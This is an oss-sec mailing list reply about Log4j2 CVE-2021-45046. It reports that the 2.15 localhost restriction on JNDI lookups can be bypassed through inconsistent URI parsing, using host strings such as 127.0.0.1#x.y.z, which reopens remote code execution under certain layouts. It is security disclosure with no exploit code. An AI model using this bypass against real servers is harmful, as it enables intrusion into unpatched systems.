oss-sec mailing list archives
Re: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack
From: Moritz Bechler <mbechler () eenterphace org>
Date: Sat, 18 Dec 2021 11:30:16 +0100
Hi,
For =2.15 this is mostly mitigated by the fact protocol and target host to which lookups are possible are also restricted to localhost by default. There still seems to be a way to hang/crash the process, thou.
Updating that for completeness: a bypass of that hostname restriction was found by Alvaro Munoz, exploiting different URI interpretations by the standard Uri class and JNDI.
Therefore 2.15 can be vulnerable again for RCE, if a layoutwith attacker-controlled input outside the message is used or the expression lookup has been re-enabled.
This also requires resolving a DNS name like 127.0.0.1#x.y.z or localhost#x.y.z, which some resolvers and likely recursors will directly reject.
Moritz
Current thread:
- CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack Ron Grabowski (Dec 14)
- Re: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack Jeffrey Walton (Dec 15)
- Re: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack Moritz Bechler (Dec 15)
- Re: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack Moritz Bechler (Dec 18)
- Re: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack Moritz Bechler (Dec 15)
- Re: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack Jeffrey Walton (Dec 15)